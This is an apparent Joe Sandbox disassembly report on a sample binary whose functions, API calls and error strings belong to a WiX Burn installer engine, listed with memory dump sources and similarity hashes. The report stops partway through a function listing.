Instruction Fuzzy Hash: 8CC012321A420CABCB006FF8EC8EC9A3BACBB28602B048400B905C2120C738E118EB60

Function 004CF9E3 Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

button, xrefs: 004CFD15
Classification, xrefs: 004CFEE2
Failed to get @HelpLink., xrefs: 004CFC04
HelpLink, xrefs: 004CFBED
Failed to get @ProductFamily., xrefs: 004CFEB3
ParentDisplayName, xrefs: 004CFC81
Register, xrefs: 004CFB5D
Failed to get @PerMachine., xrefs: 004CFB25
Invalid modify disabled type: %ls, xrefs: 004CFD94
Failed to get @DisplayVersion., xrefs: 004CFBBA
Failed to get @HelpTelephone., xrefs: 004CFC29
Failed to get @Contact., xrefs: 004CFCE8
Failed to get @Comments., xrefs: 004CFCC0
Failed to get @Version., xrefs: 004CFAA4
ProviderKey, xrefs: 004CFAD3
Failed to get @AboutUrl., xrefs: 004CFC4E
DisplayName, xrefs: 004CFB7E
clbcatq.dll, xrefs: 004CFA56
Failed to get @Department., xrefs: 004CFE8E
DisableModify, xrefs: 004CFCF6
Registration, xrefs: 004CF9FD
Failed to select registration node., xrefs: 004CFA1C
Name, xrefs: 004CFEC1
HelpTelephone, xrefs: 004CFC12
DisableRemove, xrefs: 004CFDC9
Failed to get @UpdateUrl., xrefs: 004CFC73
UpdateUrl, xrefs: 004CFC5C
Failed to select ARP node., xrefs: 004CFB4F
Failed to get @Classification., xrefs: 004CFEF5
yes, xrefs: 004CFD36
AboutUrl, xrefs: 004CFC37
Comments, xrefs: 004CFCA9
Failed to get @DisableModify., xrefs: 004CFDB8
msasn1.dll, xrefs: 004CFA35
ExecutableName, xrefs: 004CFAF4
Failed to get @Tag., xrefs: 004CFA6A
Update, xrefs: 004CFE1E
Failed to get @ExecutableName., xrefs: 004CFB07
Failed to parse software tag., xrefs: 004CFE10
ProductFamily, xrefs: 004CFE9C
Failed to parse @Version: %ls, xrefs: 004CFAC5
registration.cpp, xrefs: 004CFD87
Failed to get @Register., xrefs: 004CFB70
Version, xrefs: 004CFA91
Failed to parse related bundles, xrefs: 004CFA83
Failed to get @Manufacturer., xrefs: 004CFE66
Failed to get @DisplayName., xrefs: 004CFB95
Failed to select Update node., xrefs: 004CFE3C
PerMachine, xrefs: 004CFB12
ETL, xrefs: 004CF9E3
Department, xrefs: 004CFE77
Failed to get @DisableRemove., xrefs: 004CFDE0
Publisher, xrefs: 004CFBC8
Failed to get @Name., xrefs: 004CFED4
Manufacturer, xrefs: 004CFE53
Arp, xrefs: 004CFB33
Failed to get @Id., xrefs: 004CFA49
Failed to get @ProviderKey., xrefs: 004CFAE6
Failed to set registration paths., xrefs: 004CFF08
Failed to get @ParentDisplayName., xrefs: 004CFC98
DisplayVersion, xrefs: 004CFBA3
Failed to get @Publisher., xrefs: 004CFBDF
Tag, xrefs: 004CFA57
Contact, xrefs: 004CFCD1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ETL$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
API String ID: 760788290-582831563
Opcode ID: 9957e5c039d4054999c08ef14924232e6b3a488b225f49c7e5f7999640edef74
Instruction ID: 9ca962bccd8aeacb316365d76697089c2d23341d06ed925a1ed92b4958dddbd5
Opcode Fuzzy Hash: 9957e5c039d4054999c08ef14924232e6b3a488b225f49c7e5f7999640edef74
Instruction Fuzzy Hash: 00E1173EE40A26BBDB519560CC42FEEAE66BB01710F10027BFE11F7290D76D5D4896C8

Function 004CB48B Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 004CB502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB550
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 004CB556
ReadFile.KERNELBASE(00000000,aDLH,00000040,?,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB59E
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 004CB5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB7BD

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB906

Strings

Failed to read complete section info., xrefs: 004CB9C5
Failed to seek to start of file., xrefs: 004CB581
.wix, xrefs: 004CB830
Failed to read complete image section header, index: %u, xrefs: 004CBB75
aDLH, xrefs: 004CB4A2, 004CB598, 004CB5EB, 004CB4AC, 004CB59B
Failed to open handle to engine process path., xrefs: 004CB52D
Failed to read NT header., xrefs: 004CB681
Failed to seek past optional headers., xrefs: 004CB7EB
4, xrefs: 004CB884
Failed to read signature size., xrefs: 004CB796
Failed to find Burn section., xrefs: 004CBB32
Failed to find valid DOS image header in buffer., xrefs: 004CBBEB
Failed to read image section header, index: %u, xrefs: 004CBBAC
Failed to read section info, unsupported version: %08x, xrefs: 004CB9F5
burn, xrefs: 004CB838
Failed to seek to section info., xrefs: 004CB6F8, 004CB934
Failed to read section info, data to short: %u, xrefs: 004CB8AA
Failed to read DOS header., xrefs: 004CB5CF
Failed to find valid NT image header in buffer., xrefs: 004CBBD0
PE Header from file didn't match PE Header in memory., xrefs: 004CBB11
Failed to get total size of bundle., xrefs: 004CBA23
(, xrefs: 004CB81D
Failed to allocate memory for container sizes., xrefs: 004CBAD3
Failed to read section info., xrefs: 004CB999
section.cpp, xrefs: 004CB523, 004CB577, 004CB5C5, 004CB628, 004CB677, 004CB6EE, 004CB73D, 004CB78C, 004CB7E1, 004CB898, 004CB8D8, 004CB92A, 004CB98F, 004CB9B9, 004CB9E0, 004CBAC7, 004CBB07, 004CBB26, 004CBB63, 004CBBA1, 004CBBC4, 004CBBDF
Failed to allocate buffer for section info., xrefs: 004CB8E4
Failed to read signature offset., xrefs: 004CB747
PE, xrefs: 004CB698
Failed to seek to NT header., xrefs: 004CB632

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aDLH$burn$section.cpp
API String ID: 3411815225-3567502975
Opcode ID: 8c184b6e6d3cd9ca0d30352e2fca839b7a5ec6eb293ed1a9fde364f519bded54
Instruction ID: 599983934f2db9f28ed0abba5883338d08c0c1f9d0efc01bda9e4b63f62f4d76
Opcode Fuzzy Hash: 8c184b6e6d3cd9ca0d30352e2fca839b7a5ec6eb293ed1a9fde364f519bded54
Instruction Fuzzy Hash: 3012E77A940235ABDB709A55CC47FAF7AA8FB04710F11419EFD04BB280E7799D408BE9

Function 004E0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,004E08BC,?,?), ref: 004E0D25
GetLastError.KERNEL32(?,?,?,?,004E08BC,?,?), ref: 004E0D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,004E08BC,?,?), ref: 004E0D74
GetLastError.KERNEL32(?,?,?,?,004E08BC,?,?), ref: 004E0D7F
ResetEvent.KERNEL32(?,?,?,?,?,004E08BC,?,?), ref: 004E0DB7
GetLastError.KERNEL32(?,?,?,?,004E08BC,?,?), ref: 004E0DC1

Strings

Failed to set file pointer to beginning of file., xrefs: 004E10D8
Invalid operation for this state., xrefs: 004E0E1D
Failed to wait for begin operation event., xrefs: 004E0DAD, 004E0EE6
Failed to set operation complete event., xrefs: 004E0D5D, 004E0E9E
cabextract.cpp, xrefs: 004E0D53, 004E0DA3, 004E0DE5, 004E0E11, 004E0E94, 004E0EDC, 004E0F21, 004E0F89, 004E0FF4, 004E1045, 004E108A, 004E10CE
Failed to copy stream name: %ls, xrefs: 004E0E50
Failed to create file: %ls, xrefs: 004E1001
Failed to allocate buffer for stream., xrefs: 004E0F93
Failed to reset begin operation event., xrefs: 004E0DEF, 004E0F2B
Failed to set file pointer to end of file., xrefs: 004E104F
Failed to set end of file., xrefs: 004E1094

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 621b3f21c0c50ca10f99553bfc0bc00fd5b9931b7c4edd6ff63f64a0ce5b416b
Instruction ID: 2e5c0d059cb8d25e4cf3744b10a089a99ab7d93b59bda7eb14d0e54d751f92e7
Opcode Fuzzy Hash: 621b3f21c0c50ca10f99553bfc0bc00fd5b9931b7c4edd6ff63f64a0ce5b416b
Instruction Fuzzy Hash: AB912E379816B377E73216A74D49F6B2950BF00B22F114617BE20BE7D0D3A9DC8092DA

Function 004C4D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,004C10DD,?,00000000), ref: 004C33E8

CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 004C4F40
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 004C4F4F
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 004C4F5E
CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 004C4F69

Strings

burn.filehandle.attached, xrefs: 004C4E17
Failed to launch clean room process: %ls, xrefs: 004C4EF7
burn.filehandle.self, xrefs: 004C4E45
engine.cpp, xrefs: 004C4EEA
Failed to append %ls, xrefs: 004C4E1C
-%ls="%ls", xrefs: 004C4DE6
burn.clean.room, xrefs: 004C4DDE
Failed to allocate full command-line., xrefs: 004C4E8E
Failed to append original command line., xrefs: 004C4E69
"%ls" %ls, xrefs: 004C4E7A
Failed to allocate parameters for unelevated process., xrefs: 004C4DFA
Failed to wait for clean room process: %ls, xrefs: 004C4F23
%ls %ls, xrefs: 004C4E55
D, xrefs: 004C4EA9
Failed to get path for current process., xrefs: 004C4D83
Failed to cache to clean room., xrefs: 004C4DC2

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3884789274-2391192076
Opcode ID: 57d4605a3dd17f4afb5f003b4f76d22e76bdbc5e3ee3aefd88d0c5b1e31ca5ea
Instruction ID: 3fc31043eda6e1b4ebc90c834a02f831e2f0f8c09e774f4b1acabba655aa1bae
Opcode Fuzzy Hash: 57d4605a3dd17f4afb5f003b4f76d22e76bdbc5e3ee3aefd88d0c5b1e31ca5ea
Instruction Fuzzy Hash: FA71D776D0022AABDB619AD4CD45FEF7B78BF44720F01011BF910B7291D7789A018BE5

Function 004D752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to parse command line., xrefs: 004D7667
Failed to get source process folder from path., xrefs: 004D7725
Failed to set original source variable., xrefs: 004D776A
Failed to open attached UX container., xrefs: 004D758E
Failed to get manifest stream from container., xrefs: 004D75CC
Failed to overwrite the %ls built-in variable., xrefs: 004D76BB
WixBundleElevated, xrefs: 004D76A5, 004D76B6
Failed to load manifest., xrefs: 004D75E8
Failed to set source process folder variable., xrefs: 004D7745
Failed to open manifest stream., xrefs: 004D75AB
Failed to set source process path variable., xrefs: 004D7709
Failed to initialize internal cache functionality., xrefs: 004D779F
WixBundleUILevel, xrefs: 004D76D6, 004D76E7
Failed to extract bootstrapper application payloads., xrefs: 004D77EF
WixBundleOriginalSource, xrefs: 004D7759
Failed to initialize variables., xrefs: 004D7571
WixBundleSourceProcessPath, xrefs: 004D76F8
WixBundleSourceProcessFolder, xrefs: 004D7734
Failed to get unique temporary folder for bootstrapper application., xrefs: 004D77CE
Failed to load catalog files., xrefs: 004D780F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: 892fbdc08e8b6e879cfc6e404bda21791dc8c98b7ce1f0740eb81b9f701b3b09
Instruction ID: c4137661b01e9020a74d9c71f89a1e2d96f5a3cb0b2be45a4fbea76fe19b419a
Opcode Fuzzy Hash: 892fbdc08e8b6e879cfc6e404bda21791dc8c98b7ce1f0740eb81b9f701b3b09
Instruction Fuzzy Hash: 2CA1C872E44616BADB129AA0CC95FEFBBAC7B00744F00066BF514E7340E734E9449BA9

Function 004D86D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,004C4DBC,?,?,00000000,004C4DBC,00000000), ref: 004D8713
GetLastError.KERNEL32 ref: 004D8720

Part of subcall function 00503EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00503F73

SetFilePointerEx.KERNEL32(00000000,0050B4B8,00000000,00000000,00000000,?,00000000,0050B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004D87CD
GetLastError.KERNEL32 ref: 004D87D7
CloseHandle.KERNELBASE(00000000,?,00000000,0050B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004D8902

Strings

cabinet.dll, xrefs: 004D887B
Failed to update signature offset., xrefs: 004D8821
msi.dll, xrefs: 004D8814
Failed to seek to beginning of engine file: %ls, xrefs: 004D8779
Failed to create engine file at path: %ls, xrefs: 004D8751
Failed to seek to checksum in exe header., xrefs: 004D8805
Failed to seek to original data in exe burn section header., xrefs: 004D88DB
Failed to seek to signature table in exe header., xrefs: 004D886C
cache.cpp, xrefs: 004D8744, 004D87FB, 004D8862, 004D88D1
Failed to copy engine from: %ls to: %ls, xrefs: 004D87A8
Failed to zero out original data offset., xrefs: 004D88F4

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerRead
String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 3456208997-1976062716
Opcode ID: cf110c45a8acfc89a3d1b0596b1676f6a04d911479384aa59bb422845ccdf86e
Instruction ID: 5dcfa510af45d2138b3325c27f523f1536a70f79c29ac8086774d0c98425f8b9
Opcode Fuzzy Hash: cf110c45a8acfc89a3d1b0596b1676f6a04d911479384aa59bb422845ccdf86e
Instruction Fuzzy Hash: F751B976A41136BBE7216A548C5AFBF7A68FF44710F11016FFE00BB381DA159C0196EA

Function 004C762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(004D756B,004C53BD,00000000,004C5445), ref: 004C764C

Strings

WixBundleExecutePackageCacheFolder, xrefs: 004C7D98
', xrefs: 004C78EB
WixBundleAction, xrefs: 004C7D76
LogonUser, xrefs: 004C7882
$, xrefs: 004C7D49
WixBundleElevated, xrefs: 004C7E46
WixBundleInstalled, xrefs: 004C7E2A
0, xrefs: 004C7663
WixBundleActiveParent, xrefs: 004C7E62
InstallerVersion, xrefs: 004C7833
WixBundleForcedRestartPackage, xrefs: 004C7E14
WixBundleVersion, xrefs: 004C7ECE
WixBundleUILevel, xrefs: 004C7EBE
WixBundleTag, xrefs: 004C7EAE
WixBundleSourceProcessPath, xrefs: 004C7E8E
WixBundleSourceProcessFolder, xrefs: 004C7E9E
InstallerName, xrefs: 004C7812
#, xrefs: 004C76CB
Date, xrefs: 004C7770
WixBundleExecutePackageAction, xrefs: 004C7DF8
Failed to add built-in variable: %ls., xrefs: 004C7F19
WixBundleProviderKey, xrefs: 004C7E7E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: a5148bc41bc16bb6a19806b599222ef02bb77f6090b60eac8251ba9060f7ffd6
Instruction ID: 9b87e39db807d5d437dc5ef46d05176994d2144ae638c857a627b85d8a49a51c
Opcode Fuzzy Hash: a5148bc41bc16bb6a19806b599222ef02bb77f6090b60eac8251ba9060f7ffd6
Instruction Fuzzy Hash: E3324CB4C116299BDBA5CF5AC9887DDFEF4BB49304F5086EED10CA6250C7B41B888F49

Function 004D82BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,004C5489), ref: 004D8310

Part of subcall function 00500879: OpenProcessToken.ADVAPI32(?,00000008,?,004C53BD,00000000,?,?,?,?,?,?,?,004D769D,00000000), ref: 00500897
Part of subcall function 00500879: GetLastError.KERNEL32(?,?,?,?,?,?,?,004D769D,00000000), ref: 005008A1
Part of subcall function 00500879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,004D769D,00000000), ref: 0050092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 004D8336
GetLastError.KERNEL32 ref: 004D8340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 004D83BD
GetLastError.KERNEL32 ref: 004D83C7
UuidCreate.RPCRT4(?), ref: 004D8406

Strings

Failed to get windows path for working folder., xrefs: 004D836E
Failed to concat Temp directory on windows path for working folder., xrefs: 004D83AD
4Wu, xrefs: 004D83BD
Failed to convert working folder guid into string., xrefs: 004D8446
Failed to get temp path for working folder., xrefs: 004D83F5
Failed to ensure windows path for working folder ended in backslash., xrefs: 004D838B
Temp\, xrefs: 004D8395
Failed to create working folder guid., xrefs: 004D8413
Failed to append bundle id on to temp path for working folder., xrefs: 004D8470
Failed to copy working folder path., xrefs: 004D848B
%ls%ls\, xrefs: 004D8458
cache.cpp, xrefs: 004D8364, 004D83EB, 004D843C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4Wu$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-571614469
Opcode ID: de33a0add42a7f139c3f610ca065f514bf0b42e92f506020be15a6790a122df5
Instruction ID: d42071e9103b3d4b32eab26ac0b3a33f4dfec986259cfa212d568e3ee6ad5418
Opcode Fuzzy Hash: de33a0add42a7f139c3f610ca065f514bf0b42e92f506020be15a6790a122df5
Instruction Fuzzy Hash: 76410876A40325B7E730E6A18C59FAF766CAB00B10F11416FBE08F7340EB799D4486E9

Function 004E10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 004E111D
CoUninitialize.COMBASE ref: 004E1398

Strings

